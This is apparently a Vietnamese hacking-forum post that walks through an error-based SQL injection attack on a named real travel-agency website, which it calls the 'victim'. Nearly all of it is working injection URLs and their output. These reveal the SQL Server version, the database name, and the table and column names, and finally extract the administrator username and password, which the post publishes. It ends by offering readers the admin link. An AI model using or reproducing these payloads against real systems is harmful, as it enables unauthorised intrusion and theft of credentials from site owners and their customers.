victim: http://www.saobientravel.com/

lấy em này làm dung dịch thí nghiệm:

việc tiếp theo là cho quì tím để nhận biết nó là axit hay bazơ.


áh hự. nó ra lỗi này.

Unclosed quotation mark after the character string ''.
và chúng ta đã nhận biết nó là Muối ^^.

Giờ ta tìm version của muối này :

http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,@@version)-- -

ta đc
Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86)
Jul 9 2008 14:43:34
Copyright (c) 1988-2008 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2)

đó là version của nó
sever windows NT 5.2
giờ sẽ get tên database :
http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,db_name())-- -

nó đây : saobientravel_vn

user của nó đây saobientravel_vn
giờ mình sẽ get table name của nó nha

http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -

nó ra chỉ 1 table là 'KHACHHANG_53'
ta phải làm cho nó hiển thị các table khác

http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in () ))-- -

nó ra 1 table khác 'DONHANG_55'
cứ như thế sẽ ra các table cần ììm
mình có check trước ròi, nó nhìu table name lắm đa số là giả
'KHACHHANG_53','DONHANG_55','QUOCGIA_7','KHACHHANG ','DOITAC_43','quocgia','HOIDAP_44','DIEMDEN_KHACH SAN_41','QUANGCAO_22''HINHTOUR_36','QUANGCAO_22',' HINHTOUR_36','DIEMDEN_37','quangcao','HINHTOUR','D IEMDEN','PHUONGTIEN_39','HINHTINTUC_17','DICHVU_19 ','phuongtien','HINHSANPHAM_27','dichvu','PHONGKHA CHSAN_32','HINHQUANGCAO_23','CHINHANH_54','PHIEUXU AT_CHITIET_52','HINHKS','bookingtrain','PHIEUXUAT_ 51','HINHKHACHSAN_31','BAOGIA_42','PHIEUNHAP_CHITI ET_50','HINHGIOITHIEU_55','BANER_2','PHIEUNHAP_49' ,'HINHDICHVU_20','baner','NHANXET_5','HINHANH_12', 'VIDEO_14','nhanxet','hdtour','video','NGANHNGHE_5 4','hdhotel','TUYENDUNG_48','LOAIVIDEO_13','GUIMAI L_56','TOUR_PHUONGTIEN_40','LOAITUYENDUNG_47','GIO ITHIEU_6','TOUR_KHACHSAN_38','LOAITOUR_34','gioith ieu','TOUR_DIEMDEN','LOAITINTUC_15','giavisa','TOU R_35','LOAITAILIEU_45','giavetau','TOUR','LOAISANP HAM_25','giatour','TOP_MENU_53','LOAIQUANGCAO_21', 'giaphong','TINTUC_16','LOAIKHACHSAN_29','vungmien ','tintuc','LOAIHINHANH_11','tinhthanh','TINHTHANH _9','LOAIDICHVU_18','VUNGMIEN_8','LOAIBAOGIA_42_1' ,'THONGTINGUIMAIL_10','LOAIBANER_2_1','thongtingui mail','LIENKET_3','THELOAITOUR_33','lienket','THEL OAISANPHAM_24','KHlienhe','THELOAIKHACSAN_28','KHA CHSAN_DIEMDEN','TAILIEU_46','KHACHSAN_30','TAIKHOA N_1','KHACHSAN','TaiKhoan'
những table name nào mà có _số đều là giả
đây là table ta cần tìm 'TaiKhoan' k có số phía sau
ừm mà chỉ có trang này thỳ có _số mới là giả vì mỗi trang mỗi khác mà
ok giờ mình sẽ get column
?idtour=183 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('TaiKhoan') ))-- -

có 1 column 'IDtaikhoan' mình sẽ get column khác
http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('TaiKhoan') and column_name not in ('IDtaikhoan') ))-- -

nó ra 'TENDANGNHAP' . ta tiếp tục thêm vào để get như get table

http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('TaiKhoan') and column_name not in ('IDtaikhoan','TENDANGNHAP') ))-- -

kết quả là 'MATKHAU'
ok đã có 2 column TENDANGNHAP và MATKHAU
bây giờ mình sẽ get user và pass

http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 TENDANGNHAP from TaiKhoan ))-- -

http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 MATKHAU from TaiKhoan ))-- -

kết quả :

user: admin
pass: admin

tặng anh em link admin :

